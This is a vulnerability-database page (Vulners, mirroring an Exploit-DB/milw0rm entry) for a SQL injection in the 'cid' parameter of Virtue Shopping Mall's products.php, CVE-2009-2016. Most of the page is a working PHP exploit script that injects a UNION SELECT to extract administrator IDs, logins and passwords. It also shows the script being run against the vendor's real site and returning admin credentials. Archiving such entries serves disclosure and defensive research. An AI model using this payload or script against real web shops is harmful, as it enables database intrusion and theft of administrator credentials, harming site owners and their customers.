Lucene search
+L

Virtue Shopping Mall - 'cid' SQL Injection

🗓️ 08 Jun 2009 00:00:00Reported by OzXType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 32 Views

Virtue Shopping Mall - 'cid' SQL Injection on products.ph

Related
Code
ReporterTitlePublishedViews
Family
circl
Circl
CVE-2009-2016
8 Jun 200900:00
circl
cve
CVE
CVE-2009-2016
9 Jun 200919:00
cve
cvelist
Cvelist
CVE-2009-2016
9 Jun 200919:00
cvelist
euvd
EUVD
EUVD-2009-2012
7 Oct 202500:30
euvd
nvd
NVD
CVE-2009-2016
9 Jun 200919:30
nvd
prion
Prion
Sql injection
9 Jun 200919:30
prion
CMS : Virtue Shopping Mall
WEB  : http://www.virtuenetz.com/mall/
Archivo : products.php
Variable Tipo : GET
valor : cid
Tipo : SQL Injection
URL : http://www.site.com/products.php?cid=[SQLI]

Exploit :
<?
$web  = $argv[1];
$url = $web."/products.php?cid=8+and+1=0+union+select+all+concat(0x756E646572,id,0x3A,login,0x3A,password,0x736563)+from+admin+limit+0,1";
preg_match_all("/under(.*)sec/",file_get_contents($url),$salida, PREG_PATTERN_ORDER);
$info = explode(":",$salida[1][0]);
echo "ID :".$info[0]."\n";
echo "Usuario : ".$info[1]."\n";
echo "Password : ".$info[2]."\n";
?>


undersec@Undersec:~/Escritorio$ php exploit.php http://www.virtuenetz.com/mall/

ID :1
Usuario : admin
Password : admin

Gretz :
C1c4tr1z(voodoo-labs.org),Nobody,1995,Lix (arrivalsec.wordpress.com),NanoNRoses,Codebreak(?),Nork And All Friends of Undersecurity.net.

100% CHILE
WWW.UNDERSECURITY.NET

# milw0rm.com [2009-06-08]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

08 Jun 2009 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 27.5
EPSS0.01011
32